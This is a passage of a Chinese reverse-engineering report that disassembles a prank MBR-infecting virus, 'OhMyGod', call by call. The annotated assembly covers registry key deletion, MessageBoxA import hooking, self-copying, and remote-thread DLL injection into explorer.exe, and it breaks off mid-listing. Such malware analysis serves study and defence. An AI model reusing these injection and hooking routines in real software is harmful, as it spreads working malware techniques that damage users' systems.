对一个恶意MBR代码的详细分析

JoyChou

基本信息：

  报告名称：OhMyGod病毒分析
  作者：JoyChou
  样本类型：MBR感染
  样本文件大小：268 KB (274,432 字节)
  样本MD5：3AE53CB468E2DF56A3E424E934BF30CF
  壳信息：无壳

简介
该样本是一个修改MBR的玩笑病毒。

被感染的系统症状

感染该样本后，重启电脑电脑将无法正常启动，只会显示一窜字符串。

文件系统变化

修改MBR，释放rand().txt以及rand().dll

注册表变化

删除HKEN_CURRENT_USER子健Keyboard Layout\Preload，删除输入法

网络症状

无

[AppleScript] 纯文本查看 复制代码

?

001 002 003 004 005 006 007 008 009 010 011 012 013 014 015 016 017 018 019 020 021 022 023 024 025 026 027 028 029 030 031 032 033 034 035 036 037 038 039 040 041 042 043 044 045 046 047 048 049 050 051 052 053 054 055 056 057 058 059 060 061 062 063 064 065 066 067 068 069 070 071 072 073 074 075 076 077 078 079 080 081 082 083 084 085 086 087 088 089 090 091 092 093 094 095 096 097 098 099 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184

来到OEP，看到几个关键call，每个都详细分析下 004017A0  /$  E8 FBFEFFFF   call OhMyGod.004016A0 004017A5  |.  E8 76FDFFFF   call OhMyGod.00401520 004017AA  |.  E8 A1F8FFFF   call OhMyGod.00401050 004017AF  |.  E8 5CFDFFFF   call OhMyGod.00401510 004017B4  |.  E8 C7F8FFFF   call OhMyGod.00401080 004017B9  |.  E8 92F9FFFF   call OhMyGod.00401150 004017BE  |.  E8 0DFFFFFF   call OhMyGod.004016D0 004017C3  |.  E8 58F8FFFF   call OhMyGod.00401020 004017C8  |.  6A 00         push 0x0                                 ; /Style = MB_OK|MB_APPLMODAL 004017CA  |.  68 1C914000   push OhMyGod.0040911C                    ; |111 004017CF  |.  68 14914000   push OhMyGod.00409114                    ; |Good 004017D4  |.  6A 00         push 0x0                                 ; |hOwner = NULL 004017D6  |.  FF15 5C814000 call dword ptr ds:[<&USER32.MessageBoxA>>; \MessageBoxA 004017DC  |.  E8 EFFAFFFF   call OhMyGod.004012D0 004017E1  |.  6A 00         push 0x0 004017E3  |.  6A 02         push 0x2 004017E5  |.  E8 B6FCFFFF   call OhMyGod.004014A0 004017EA  |.  83C4 08       add esp,0x8 004017ED  \.  C3            retn   004017A0  /$  E8 FBFEFFFF   call OhMyGod.004016A0   这个call 进入 004016A0  |$  6A 00         push 0x0                                 ; /pThreadId = NULL 004016A2  |.  6A 00         push 0x0                                 ; |CreationFlags = 0 004016A4  |.  6A 00         push 0x0                                 ; |pThreadParm = NULL 004016A6  |.  68 60154000   push OhMyGod.00401560                    ; |创建一个线程，来到线程函数 004016AB  |.  6A 00         push 0x0                                 ; |StackSize = 0 004016AD  |.  6A 00         push 0x0                                 ; |pSecurity = NULL 004016AF  |.  FF15 74804000 call dword ptr ds:[<&KERNEL32.CreateThre>; \CreateThread 004016B5  |.  50            push eax                                 ; /hObject 004016B6  |.  FF15 B0804000 call dword ptr ds:[<&KERNEL32.CloseHandl>; \CloseHandle 004016BC  \.^ E9 CFFFFFFF   jmp OhMyGod.00401690   我们来到线程函数 00401560   .  83EC 0C       sub esp,0xC 00401563   .  53            push ebx 00401564   .  55            push ebp 00401565   .  56            push esi 00401566   .  57            push edi 00401567   .  E8 E4FAFFFF   call OhMyGod.00401050                    ;  //删除注册表信息（这个call就没有进去了，很简单的） 0040156C   .  33DB          xor ebx,ebx 0040156E   .  68 3F000F00   push 0xF003F 00401573   .  53            push ebx 00401574   .  53            push ebx 00401575   .  FF15 04804000 call dword ptr ds:[<&ADVAPI32.OpenSCMana>;  打开服务管理器，SCM是服务管理器的意思 0040157B   .  8BE8          mov ebp,eax 0040157D   .  3BEB          cmp ebp,ebx 0040157F   .  75 0C         jnz XOhMyGod.0040158D 00401581   .  5F            pop edi 00401582   .  5E            pop esi 00401583   .  5D            pop ebp 00401584   .  33C0          xor eax,eax 00401586   .  5B            pop ebx 00401587   .  83C4 0C       add esp,0xC 0040158A   .  C2 0400       retn 0x4 0040158D   >  8D4424 14     lea eax,dword ptr ss:[esp+0x14] 00401591   .  8B3D 08804000 mov edi,dword ptr ds:[<&ADVAPI32.EnumSer>;  advapi32.EnumServicesStatusA 00401597   .  53            push ebx                                 ; /pResumeHandle 00401598   .  8D4C24 14     lea ecx,dword ptr ss:[esp+0x14]          ; | 0040159C   .  50            push eax                                 ; |pCount 0040159D   .  51            push ecx                                 ; |pBytesNeeded 0040159E   .  53            push ebx                                 ; |BufSize 0040159F   .  53            push ebx                                 ; |pEnumStatus 004015A0   .  6A 03         push 0x3                                 ; |ServiceState = 3 004015A2   .  6A 3B         push 0x3B                                ; |ServiceType = SERVICE_KERNEL_DRIVER|SERVICE_FILE_SYSTEM_DRIVER|SERVICE_RECOGNIZER_DRIVER|SERVICE_WIN32_OWN_PROCESS|SERVICE_WIN32_SHARE_PROCESS 004015A4   .  55            push ebp                                 ; |hManager 004015A5   .  895C24 34     mov dword ptr ss:[esp+0x34],ebx          ; | 004015A9   .  895C24 30     mov dword ptr ss:[esp+0x30],ebx          ; | 004015AD   .  FFD7          call edi                                 ; \枚举服务 004015AF   .  8B5424 10     mov edx,dword ptr ss:[esp+0x10] 004015B3   .  52            push edx                                 ; /Size 004015B4   .  6A 40         push 0x40                                ; |Flags = LPTR 004015B6   .  FF15 70804000 call dword ptr ds:[<&KERNEL32.LocalAlloc>; \LocalAlloc  ;分配内存 004015BC   .  8BF0          mov esi,eax 004015BE   .  3BF3          cmp esi,ebx 004015C0   .  75 13         jnz XOhMyGod.004015D5 004015C2   .  55            push ebp 004015C3   .  FF15 0C804000 call dword ptr ds:[<&ADVAPI32.CloseServi>;  关闭服务 004015C9   .  5F            pop edi 004015CA   .  5E            pop esi 004015CB   .  5D            pop ebp 004015CC   .  33C0          xor eax,eax 004015CE   .  5B            pop ebx 004015CF   .  83C4 0C       add esp,0xC 004015D2   .  C2 0400       retn 0x4     下面来看第二个call 004017A5  |.  E8 76FDFFFF   call OhMyGod.00401520 我们进入 00401520  /$  68 E0904000   push OhMyGod.004090E0                    ; /jinguizi 00401525  |.  6A 00         push 0x0                                 ; |InitialOwner = FALSE 00401527  |.  6A 00         push 0x0                                 ; |pSecurity = NULL 00401529  |.  FF15 68804000 call dword ptr ds:[<&KERNEL32.CreateMute>; \创建一个名为JinGuiZi的互斥对象，功能只能运行一次当前程序，不能双开 0040152F  |.  85C0          test eax,eax 00401531  |.  74 26         je XOhMyGod.00401559 00401533  |.  FF15 C0804000 call dword ptr ds:[<&KERNEL32.GetLastErr>; [GetLastError 00401539  |.  3D B7000000   cmp eax,0xB7 0040153E  |.  75 19         jnz XOhMyGod.00401559 00401540  |.  6A 00         push 0x0                                 ; /Style = MB_OK|MB_APPLMODAL 00401542  |.  6A 00         push 0x0                                 ; |Title = NULL 00401544  |.  68 CC904000   push OhMyGod.004090CC                    ; |只能有一个程序运行 00401549  |.  6A 00         push 0x0                                 ; |hOwner = NULL 0040154B  |.  FF15 5C814000 call dword ptr ds:[<&USER32.MessageBoxA>>; \MessageBoxA 00401551  |.  6A 00         push 0x0                                 ; /ExitCode = 0 00401553  |.  FF15 60804000 call dword ptr ds:[<&KERNEL32.ExitProces>; \ExitProcess 00401559  \>  C3            retn   下面我们进入004017AA  |.  E8 A1F8FFFF   call OhMyGod.00401050第三个call 还是打开注册表，删除子键 00401050  /$  51            push ecx                                 ;  删除HKEN_CURRENT_USER子健Keyboard Layout\Preload 00401051  |.  8D4424 00     lea eax,dword ptr ss:[esp] 00401055  |.  50            push eax                                 ; /pHandle 00401056  |.  6A 08         push 0x8                                 ; |Access = KEY_ENUMERATE_SUB_KEYS 00401058  |.  6A 00         push 0x0                                 ; |Reserved = 0 0040105A  |.  68 44904000   push OhMyGod.00409044                    ; |Keyboard Layout\Preload 0040105F  |.  68 01000080   push 0x80000001                          ; |hKey = HKEY_CURRENT_USER 00401064  |.  FF15 1C804000 call dword ptr ds:[<&ADVAPI32.RegOpenKey>; \RegOpenKeyExA 0040106A  |.  68 44904000   push OhMyGod.00409044                    ; /Keyboard Layout\Preload 0040106F  |.  68 01000080   push 0x80000001                          ; |hKey = HKEY_CURRENT_USER 00401074  |.  FF15 20804000 call dword ptr ds:[<&ADVAPI32.RegDeleteK>; \RegDeleteKeyA 0040107A  |.  59            pop ecx 0040107B  \.  C3            retn   下面看004017AF  |.  E8 5CFDFFFF   call OhMyGod.00401510第四个call 00401510  /$  6A 00         push 0x0                                 ; /Enable = FALSE 00401512  |.  FF15 60814000 call dword ptr ds:[<&USER32.GetForegroun>; |[GetForegroundWindow 00401518  |.  50            push eax                                 ; |hWnd 00401519  |.  FF15 50814000 call dword ptr ds:[<&USER32.EnableWindow>; \EnableWindow 0040151F  \.  C3            retn   再看004017B4  |.  E8 C7F8FFFF   call OhMyGod.00401080第五个call 00401080  /$  81EC 04010000 sub esp,0x104 00401086  |.  8D4424 04     lea eax,dword ptr ss:[esp+0x4] 0040108A  |.  68 00050000   push 0x500                               ; /BufSize = 500 (1280.) 0040108F  |.  50            push eax                                 ; |Buffer 00401090  |.  FF15 B4804000 call dword ptr ds:[<&KERNEL32.GetWindows>; \GetWindowsDirectoryA 00401096  |.  85C0          test eax,eax 00401098  |.  75 14         jnz XOhMyGod.004010AE 0040109A  |.  68 78904000   push OhMyGod.00409078 0040109F  |.  E8 62080000   call OhMyGod.00401906 004010A4  |.  83C4 04       add esp,0x4 004010A7  |.  81C4 04010000 add esp,0x104 004010AD  |.  C3            retn 004010AE  |>  56            push esi 004010AF  |.  6A 00         push 0x0 004010B1  |.  E8 74070000   call OhMyGod.0040182A 004010B6  |.  50            push eax 004010B7  |.  E8 46070000   call OhMyGod.00401802 004010BC  |.  E8 4B070000   call OhMyGod.0040180C                    ;  获取一个随机数，然后以这个随机数命名新建的txt，YY用 004010C1  |.  8D4C24 10     lea ecx,dword ptr ss:[esp+0x10] 004010C5  |.  68 0C184000   push OhMyGod.0040180C                    ; /<%ld> = 40180C (4200460.) 004010CA  |.  51            push ecx                                 ; |<%s> 004010CB  |.  8D9424 980000>lea edx,dword ptr ss:[esp+0x98]          ; | 004010D2  |.  68 6C904000   push OhMyGod.0040906C                    ; |Format = "%s\%ld.txt" 004010D7  |.  52            push edx                                 ; |s 004010D8  |.  FF15 58814000 call dword ptr ds:[<&USER32.wsprintfA>]  ; \wsprintfA 004010DE  |.  83C4 18       add esp,0x18 004010E1  |.  8D8424 880000>lea eax,dword ptr ss:[esp+0x88]          ;  在windows目录下创建rand().txt文件 004010E8  |.  6A 00         push 0x0                                 ; /hTemplateFile = NULL 004010EA  |.  68 80000000   push 0x80                                ; |Attributes = NORMAL 004010EF  |.  6A 02         push 0x2                                 ; |Mode = CREATE_ALWAYS 004010F1  |.  6A 00         push 0x0                                 ; |pSecurity = NULL 004010F3  |.  6A 02         push 0x2                                 ; |ShareMode = FILE_SHARE_WRITE 004010F5  |.  68 00000010   push 0x10000000                          ; |Access = GENERIC_ALL 004010FA  |.  50            push eax                                 ; |FileName 004010FB  |.  FF15 B8804000 call dword ptr ds:[<&KERNEL32.CreateFile>; \CreateFileA 00401101  |.  8D4C24 04     lea ecx,dword ptr ss:[esp+0x4]           ;  写入“金龟子真棒” 00401105  |.  6A 00         push 0x0                                 ; /pOverlapped = NULL 00401107  |.  51            push ecx                                 ; |pBytesWritten 00401108  |.  8BF0          mov esi,eax                              ; | 0040110A  |.  6A 0E         push 0xE                                 ; |nBytesToWrite = E (14.) 0040110C  |.  68 5C904000   push OhMyGod.0040905C                    ; |Buffer = OhMyGod.0040905C 00401111  |.  56            push esi                                 ; |hFile 00401112  |.  FF15 BC804000 call dword ptr ds:[<&KERNEL32.WriteFile>>; \WriteFile 00401118  |.  56            push esi                                 ; /hObject 00401119  |.  FF15 B0804000 call dword ptr ds:[<&KERNEL32.CloseHandl>; \CloseHandle 0040111F  |.  E8 2CFFFFFF   call OhMyGod.00401050 00401124  |.  5E            pop esi 00401125  |.  81C4 04010000 add esp,0x104 0040112B  \.  C3            retn   我们进去这个004010B1  |.  E8 74070000   call OhMyGod.0040182A看下 获取随机数

在看第六个call之前，我们看下母本的输入表

输入表

[AppleScript] 纯文本查看 复制代码

?

001 002 003 004 005 006 007 008 009 010 011 012 013 014 015 016 017 018 019 020 021 022 023 024 025 026 027 028 029 030 031 032 033 034 035 036 037 038 039 040 041 042 043 044 045 046 047 048 049 050 051 052 053 054 055 056 057 058 059 060 061 062 063 064 065 066 067 068 069 070 071 072 073 074 075 076 077 078 079 080 081 082 083 084 085 086 087 088 089 090 091 092 093 094 095 096 097 098 099 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341

接着，继续 00401150  /$  83EC 24       sub esp,0x24 00401153  |.  53            push ebx 00401154  |.  56            push esi 00401155  |.  57            push edi                                                  ;  获取当前进程 00401156  |.  6A 00         push 0x0                                                  ; /pModule = NULL 00401158  |.  FF15 64804000 call dword ptr ds:[<&KERNEL32.GetModuleHandleA>]          ; \GetModuleHandleA 0040115E  |.  8BF8          mov edi,eax 00401160  |.  8B47 3C       mov eax,dword ptr ds:[edi+0x3C]                           ;  获取PE头 00401163  |.  8BB438 800000>mov esi,dword ptr ds:[eax+edi+0x80]                       ;  获取输入表 0040116A  |.  8B443E 10     mov eax,dword ptr ds:[esi+edi+0x10]                       ;  获取IAT 0040116E  |.  03F7          add esi,edi 00401170  |.  85C0          test eax,eax 00401172  |.  74 21         je XOhMyGod.00401195 00401174  |.  8B1D 9C804000 mov ebx,dword ptr ds:[<&KERNEL32.lstrcmpiA>]              ;  将lstrcmpiA函数地址给ebx 0040117A  |>  8B46 0C       /mov eax,dword ptr ds:[esi+0xC]                           ;  获取输入表名字 0040117D  |.  68 8C904000   |push OhMyGod.0040908C                                    ;  ASCII "USER32.DLL" 00401182  |.  03C7          |add eax,edi 00401184  |.  50            |push eax 00401185  |.  FFD3          |call ebx 00401187  |.  85C0          |test eax,eax                                             ;  判断是否为user32.dll 00401189  |.  74 0A         |je XOhMyGod.00401195 0040118B  |.  8B46 24       |mov eax,dword ptr ds:[esi+0x24] 0040118E  |.  83C6 14       |add esi,0x14                                             ;  加上一整个输入表的大小0x14 00401191  |.  85C0          |test eax,eax 00401193  |.^ 75 E5         \jnz XOhMyGod.0040117A 00401195  |>  8B76 10       mov esi,dword ptr ds:[esi+0x10]                           ;  将user32.dll的IAT给esi 00401198  |.  85F6          test esi,esi 0040119A  |.  74 6C         je XOhMyGod.00401208 0040119C  |.  8B043E        mov eax,dword ptr ds:[esi+edi] 0040119F  |.  03F7          add esi,edi 004011A1  |.  85C0          test eax,eax 004011A3  |.  74 63         je XOhMyGod.00401208 004011A5  |.  8B1D A0804000 mov ebx,dword ptr ds:[<&KERNEL32.VirtualQuery>]           ;  kernel32.VirtualQuery 004011AB  |.  8B3D A4804000 mov edi,dword ptr ds:[<&KERNEL32.VirtualProtect>]         ;  kernel32.VirtualProtect 004011B1  |.  55            push ebp 004011B2  |.  8B2D A8804000 mov ebp,dword ptr ds:[<&KERNEL32.WriteProcessMemory>]     ;  kernel32.WriteProcessMemory 004011B8  |>  3B05 E8BA4000 /cmp eax,dword ptr ds:[0x40BAE8]                          ;  user32.MessageBoxA 004011BE  |.  75 3D         |jnz XOhMyGod.004011FD 004011C0  |.  8D4C24 18     |lea ecx,dword ptr ss:[esp+0x18] 004011C4  |.  6A 1C         |push 0x1C 004011C6  |.  51            |push ecx 004011C7  |.  56            |push esi 004011C8  |.  FFD3          |call ebx                                                 ;  // VirtualQuery 004011CA  |.  8D5424 14     |lea edx,dword ptr ss:[esp+0x14] 004011CE  |.  52            |push edx 004011CF  |.  6A 04         |push 0x4 004011D1  |.  6A 04         |push 0x4 004011D3  |.  56            |push esi 004011D4  |.  FFD7          |call edi                                                 ;  // VirtualProtect 004011D6  |.  6A 00         |push 0x0 004011D8  |.  8D4424 14     |lea eax,dword ptr ss:[esp+0x14] 004011DC  |.  6A 04         |push 0x4                                                 ;  4个字节大小 004011DE  |.  50            |push eax                                                 ;  将MessageBoxA函数地址入栈 004011DF  |.  56            |push esi 004011E0  |.  C74424 20 301>|mov dword ptr ss:[esp+0x20],OhMyGod.00401130 004011E8  |.  FF15 AC804000 |call dword ptr ds:[<&KERNEL32.GetCurrentProcess>]        ; GetCurrentProcess 004011EE  |.  50            |push eax 004011EF  |.  FFD5          |call ebp                                                 ;  // WriteProcessMerory 004011F1  |.  8B4C24 14     |mov ecx,dword ptr ss:[esp+0x14]                          ;  将MessageBoxA函数地址写入到esi 004011F5  |.  6A 00         |push 0x0 004011F7  |.  51            |push ecx 004011F8  |.  6A 04         |push 0x4 004011FA  |.  56            |push esi 004011FB  |.  FFD7          |call edi                                                 ;  // VirtualProtect 004011FD  |>  8B46 04       |mov eax,dword ptr ds:[esi+0x4]                           ;  找到MessageBoxA函数地址，在弹出goodjob的时候就利用这个地址 00401200  |.  83C6 04       |add esi,0x4 00401203  |.  85C0          |test eax,eax 00401205  |.^ 75 B1         \jnz XOhMyGod.004011B8 00401207  |.  5D            pop ebp 00401208  |>  5F            pop edi 00401209  |.  5E            pop esi 0040120A  |.  5B            pop ebx 0040120B  |.  83C4 24       add esp,0x24 0040120E  \.  C3            retn     下面看第七个call  004017BE  |.  E8 0DFFFFFF   call OhMyGod.004016D0 进去 过程是，先获取当前出现名字，打开文件，获取文件大小，申请一块文件大小的空间， 再把申请的地址内容全部读入到一个buffer，最后写入到创建的GuiZi.exe完成自我复制的功能。   004016D0  /$  81EC 84000000 sub esp,0x84                                      ;  作者本意是复制自己文件到系统目录下的GuiZi.exe，可是，没成功 没成功的原因是：CreateFile API第二个参数应该是GENERIC_READ，因为要读取 004016D6  |.  53            push ebx                                          ;  不过为什么不直接用CopyFile呢 004016D7  |.  56            push esi 004016D8  |.  57            push edi 004016D9  |.  B9 1F000000   mov ecx,0x1F 004016DE  |.  33C0          xor eax,eax 004016E0  |.  8D7C24 11     lea edi,dword ptr ss:[esp+0x11] 004016E4  |.  C64424 10 00  mov byte ptr ss:[esp+0x10],0x0 004016E9  |.  68 80000000   push 0x80                                         ; /BufSize = 80 (128.) 004016EE  |.  F3:AB         rep stos dword ptr es:[edi]                       ; | 004016F0  |.  66:AB         stos word ptr es:[edi]                            ; | 004016F2  |.  AA            stos byte ptr es:[edi]                            ; | 004016F3  |.  8D4424 14     lea eax,dword ptr ss:[esp+0x14]                   ; | 004016F7  |.  50            push eax                                          ; |PathBuffer 004016F8  |.  6A 00         push 0x0                                          ; |hModule = NULL 004016FA  |.  FF15 80804000 call dword ptr ds:[<&KERNEL32.GetModuleFileNameA>>; \GetModuleFileNameA 00401700  |.  8B1D B8804000 mov ebx,dword ptr ds:[<&KERNEL32.CreateFileA>]    ;  kernel32.CreateFileA 00401706  |.  6A 00         push 0x0                                          ; /hTemplateFile = NULL 00401708  |.  68 80000000   push 0x80                                         ; |Attributes = NORMAL 0040170D  |.  6A 03         push 0x3                                          ; |Mode = OPEN_EXISTING 0040170F  |.  6A 00         push 0x0                                          ; |pSecurity = NULL 00401711  |.  6A 03         push 0x3                                          ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE 00401713  |.  8D4C24 24     lea ecx,dword ptr ss:[esp+0x24]                   ; | 00401717  |.  68 00000010   push 0x10000000                                   ; |Access = GENERIC_ALL 0040171C  |.  51            push ecx                                          ; |FileName 0040171D  |.  FFD3          call ebx                                          ; \CreateFileA 0040171F  |.  8D5424 0C     lea edx,dword ptr ss:[esp+0xC] 00401723  |.  8BF0          mov esi,eax 00401725  |.  52            push edx                                          ; /pFileSizeHigh 00401726  |.  56            push esi                                          ; |hFile 00401727  |.  FF15 7C804000 call dword ptr ds:[<&KERNEL32.GetFileSize>]       ; \GetFileSize 0040172D  |.  8B4424 0C     mov eax,dword ptr ss:[esp+0xC] 00401731  |.  6A 04         push 0x4                                          ; /flProtect = 4 00401733  |.  68 00100000   push 0x1000                                       ; |flAllocationType = 1000 (4096.) 00401738  |.  50            push eax                                          ; |dwSize 00401739  |.  6A 00         push 0x0                                          ; |lpAddress = NULL 0040173B  |.  6A 00         push 0x0                                          ; |hProcess = NULL 0040173D  |.  FF15 48804000 call dword ptr ds:[<&KERNEL32.VirtualAllocEx>]    ; \VirtualAllocEx 00401743  |.  8B5424 0C     mov edx,dword ptr ss:[esp+0xC] 00401747  |.  8D4C24 0C     lea ecx,dword ptr ss:[esp+0xC] 0040174B  |.  6A 00         push 0x0                                          ; /pOverlapped = NULL 0040174D  |.  8BF8          mov edi,eax                                       ; | 0040174F  |.  51            push ecx                                          ; |pBytesRead 00401750  |.  52            push edx                                          ; |BytesToRead 00401751  |.  57            push edi                                          ; |Buffer 00401752  |.  56            push esi                                          ; |hFile 00401753  |.  FF15 78804000 call dword ptr ds:[<&KERNEL32.ReadFile>]          ; \ReadFile 00401759  |.  6A 00         push 0x0                                          ; /hTemplateFile = NULL 0040175B  |.  68 80000000   push 0x80                                         ; |Attributes = NORMAL 00401760  |.  6A 02         push 0x2                                          ; |Mode = CREATE_ALWAYS 00401762  |.  6A 00         push 0x0                                          ; |pSecurity = NULL 00401764  |.  6A 03         push 0x3                                          ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE 00401766  |.  68 00000010   push 0x10000000                                   ; |Access = GENERIC_ALL 0040176B  |.  68 F4904000   push OhMyGod.004090F4                             ; |FileName = "C:\WINDOWS\SYSTEM32\GuiZi.exe" 00401770  |.  FFD3          call ebx                                          ; \CreateFileA 00401772  |.  8B4C24 0C     mov ecx,dword ptr ss:[esp+0xC] 00401776  |.  8BD8          mov ebx,eax 00401778  |.  8D4424 0C     lea eax,dword ptr ss:[esp+0xC] 0040177C  |.  6A 00         push 0x0                                          ; /pOverlapped = NULL 0040177E  |.  50            push eax                                          ; |pBytesWritten 0040177F  |.  51            push ecx                                          ; |nBytesToWrite 00401780  |.  57            push edi                                          ; |Buffer 00401781  |.  53            push ebx                                          ; |hFile 00401782  |.  FF15 BC804000 call dword ptr ds:[<&KERNEL32.WriteFile>]         ; \WriteFile 00401788  |.  8B3D B0804000 mov edi,dword ptr ds:[<&KERNEL32.CloseHandle>]    ;  kernel32.CloseHandle 0040178E  |.  53            push ebx                                          ; /hObject 0040178F  |.  FFD7          call edi                                          ; \CloseHandle 00401791  |.  56            push esi                                          ; /hObject 00401792  |.  FFD7          call edi                                          ; \CloseHandle 00401794  |.  5F            pop edi 00401795  |.  5E            pop esi 00401796  |.  5B            pop ebx                                           ;  7FFDE000 00401797  |.  81C4 84000000 add esp,0x84 0040179D  \.  C3            retn     再看第八个call  004017C3  |.  E8 58F8FFFF   call OhMyGod.00401020 完成对ASCII "Shabisafhlfiakhfdka"解密， “Shbeo}p{剱摖９孟 荏?K”，目测是个干扰，没用的地方 第9个call就弹一个提示框，我们跳过   再看第十个call 004017DC  |.  E8 EFFAFFFF   call OhMyGod.004012D0 这个call 功能：创建一个rand().dll，并LoadLibraryA(rand().dll)，注入到桌面进程，方便系统中招。 004012D0  /$  81EC 28010000 sub esp,0x128 004012D6  |.  53            push ebx 004012D7  |.  55            push ebp 004012D8  |.  56            push esi 004012D9  |.  57            push edi 004012DA  |.  33FF          xor edi,edi 004012DC  |.  C74424 10 280>mov dword ptr ss:[esp+0x10],0x128 004012E4  |.  57            push edi                                 ; /ProcessID => 0 004012E5  |.  6A 02         push 0x2                                 ; |Flags = TH32CS_SNAPPROCESS 004012E7  |.  E8 10050000   call <jmp.&KERNEL32.CreateToolhelp32Snap>; \CreateToolhelp32Snapshot 004012EC  |.  8BE8          mov ebp,eax 004012EE  |.  8D4424 10     lea eax,dword ptr ss:[esp+0x10] 004012F2  |.  50            push eax                                 ; /lppe 004012F3  |.  55            push ebp                                 ; |hSnapshot 004012F4  |.  E8 FD040000   call <jmp.&KERNEL32.Process32First>      ; \Process32First 004012F9  |.  85C0          test eax,eax 004012FB  |.  74 4F         je XOhMyGod.0040134C 004012FD  |>  BE A8904000   /mov esi,OhMyGod.004090A8                ;  ASCII "explorer.exe" 00401302  |.  8D4424 34     |lea eax,dword ptr ss:[esp+0x34] 00401306  |>  8A10          |/mov dl,byte ptr ds:[eax] 00401308  |.  8A1E          ||mov bl,byte ptr ds:[esi] 0040130A  |.  8ACA          ||mov cl,dl 0040130C  |.  3AD3          ||cmp dl,bl 0040130E  |.  75 1E         ||jnz XOhMyGod.0040132E 00401310  |.  84C9          ||test cl,cl 00401312  |.  74 16         ||je XOhMyGod.0040132A 00401314  |.  8A50 01       ||mov dl,byte ptr ds:[eax+0x1] 00401317  |.  8A5E 01       ||mov bl,byte ptr ds:[esi+0x1] 0040131A  |.  8ACA          ||mov cl,dl 0040131C  |.  3AD3          ||cmp dl,bl 0040131E  |.  75 0E         ||jnz XOhMyGod.0040132E 00401320  |.  83C0 02       ||add eax,0x2 00401323  |.  83C6 02       ||add esi,0x2 00401326  |.  84C9          ||test cl,cl 00401328  |.^ 75 DC         |\jnz XOhMyGod.00401306 0040132A  |>  33C0          |xor eax,eax 0040132C  |.  EB 05         |jmp XOhMyGod.00401333 0040132E  |>  1BC0          |sbb eax,eax 00401330  |.  83D8 FF       |sbb eax,-0x1 00401333  |>  85C0          |test eax,eax 00401335  |.  74 11         |je XOhMyGod.00401348 00401337  |.  8D4424 10     |lea eax,dword ptr ss:[esp+0x10] 0040133B  |.  50            |push eax                                ; /lppe 0040133C  |.  55            |push ebp                                ; |hSnapshot 0040133D  |.  E8 AE040000   |call <jmp.&KERNEL32.Process32Next>      ; \Process32Next 00401342  |.  85C0          |test eax,eax 00401344  |.^ 75 B7         \jnz XOhMyGod.004012FD 00401346  |.  EB 04         jmp XOhMyGod.0040134C 00401348  |>  8B7C24 18     mov edi,dword ptr ss:[esp+0x18] 0040134C  |>  57            push edi                                 ; /ProcessId 0040134D  |.  6A 00         push 0x0                                 ; |Inheritable = FALSE 0040134F  |.  68 FF0F1F00   push 0x1F0FFF                            ; |Access = PROCESS_ALL_ACCESS 00401354  |.  FF15 4C804000 call dword ptr ds:[<&KERNEL32.OpenProces>; \OpenProcess 0040135A  |.  8BF0          mov esi,eax 0040135C  |.  E8 AFFEFFFF   call OhMyGod.00401210                    ;  在系统目录创建一个rand().dll，写入MBR使用 00401361  |.  8BD8          mov ebx,eax 00401363  |.  83C9 FF       or ecx,0xFFFFFFFF 00401366  |.  8BFB          mov edi,ebx 00401368  |.  33C0          xor eax,eax 0040136A  |.  F2:AE         repne scas byte ptr es:[edi] 0040136C  |.  F7D1          not ecx 0040136E  |.  6A 04         push 0x4                                 ; /flProtect = 4 00401370  |.  49            dec ecx                                  ; | 00401371  |.  68 00100000   push 0x1000                              ; |flAllocationType = 1000 (4096.) 00401376  |.  51            push ecx                                 ; |dwSize 00401377  |.  50            push eax                                 ; |lpAddress => NULL 00401378  |.  56            push esi                                 ; |hProcess 00401379  |.  FF15 48804000 call dword ptr ds:[<&KERNEL32.VirtualAll>; \VirtualAllocEx 0040137F  |.  8BE8          mov ebp,eax 00401381  |.  8BFB          mov edi,ebx 00401383  |.  83C9 FF       or ecx,0xFFFFFFFF 00401386  |.  33C0          xor eax,eax 00401388  |.  F2:AE         repne scas byte ptr es:[edi] 0040138A  |.  F7D1          not ecx 0040138C  |.  49            dec ecx 0040138D  |.  6A 00         push 0x0                                 ; /pBytesWritten = NULL 0040138F  |.  51            push ecx                                 ; |BytesToWrite 00401390  |.  53            push ebx                                 ; |Buffer 00401391  |.  55            push ebp                                 ; |Address 00401392  |.  56            push esi                                 ; |hProcess 00401393  |.  FF15 A8804000 call dword ptr ds:[<&KERNEL32.WriteProce>; \WriteProcessMemory 00401399  |.  8B0D 44804000 mov ecx,dword ptr ds:[<&KERNEL32.LoadLib>;  kernel32.LoadLibraryA 0040139F  |.  6A 00         push 0x0                                 ; /lpThreadId = NULL 004013A1  |.  6A 00         push 0x0                                 ; |dwCreationFlags = 0 004013A3  |.  55            push ebp                                 ; |lpParameter 004013A4  |.  51            push ecx                                 ; |lpStartAddress => kernel32.LoadLibraryA 004013A5  |.  6A 00         push 0x0                                 ; |dwStackSize = 0 004013A7  |.  6A 00         push 0x0                                 ; |lpThreadAttributes 004013A9  |.  56            push esi                                 ; |hProcess 004013AA  |.  FF15 40804000 call dword ptr ds:[<&KERNEL32.CreateRemo>; \CreateRemoteThread 004013B0  |.  8BF8          mov edi,eax 004013B2  |.  6A FF         push -0x1                                ; /Timeout = INFINITE 004013B4  |.  57            push edi                                 ; |hObject 004013B5  |.  FF15 3C804000 call dword ptr ds:[<&KERNEL32.WaitForSin>; \WaitForSingleObject 004013BB  |.  68 00800000   push 